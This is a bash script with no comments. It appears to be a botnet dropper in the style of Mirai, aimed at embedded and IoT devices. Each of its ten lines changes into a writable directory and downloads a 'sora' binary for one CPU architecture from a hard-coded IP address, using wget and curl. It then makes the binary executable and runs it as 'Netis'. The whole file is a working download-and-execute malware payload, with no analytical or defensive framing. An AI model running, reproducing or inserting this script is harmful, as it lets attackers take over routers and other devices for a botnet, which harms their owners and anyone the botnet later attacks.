#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.41.36/bins/sora.x86; curl -O http://80.211.41.36/bins/sora.x86;cat sora.x86 >Netis;chmod +x *;./Netis boats.b.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.41.36/bins/sora.mips; curl -O http://80.211.41.36/bins/sora.mips;cat sora.mips >Netis;chmod +x *;./Netis boats.b.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.41.36/bins/sora.mpsl; curl -O http://80.211.41.36/bins/sora.mpsl;cat sora.mpsl >Netis;chmod +x *;./Netis boats.b.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.41.36/bins/sora.arm4; curl -O http://80.211.41.36/bins/sora.arm4;cat sora.arm4 >Netis;chmod +x *;./Netis boats.b.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.41.36/bins/sora.arm5; curl -O http://80.211.41.36/bins/sora.arm5;cat sora.arm5 >Netis;chmod +x *;./Netis boats.b.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.41.36/bins/sora.arm6; curl -O http://80.211.41.36/bins/sora.arm6;cat sora.arm6 >Netis;chmod +x *;./Netis boats.b.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.41.36/bins/sora.arm7; curl -O http://80.211.41.36/bins/sora.arm7;cat sora.arm7 >Netis;chmod +x *;./Netis boats.b.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.41.36/bins/sora.ppc; curl -O http://80.211.41.36/bins/sora.ppc;cat sora.ppc >Netis;chmod +x *;./Netis boats.b.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.41.36/bins/sora.m68k; curl -O http://80.211.41.36/bins/sora.m68k;cat sora.m68k >Netis;chmod +x *;./Netis boats.b.mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://80.211.41.36/bins/sora.sh4; curl -O http://80.211.41.36/bins/sora.sh4;cat sora.sh4 >Netis;chmod +x *;./Netis boats.b.mips
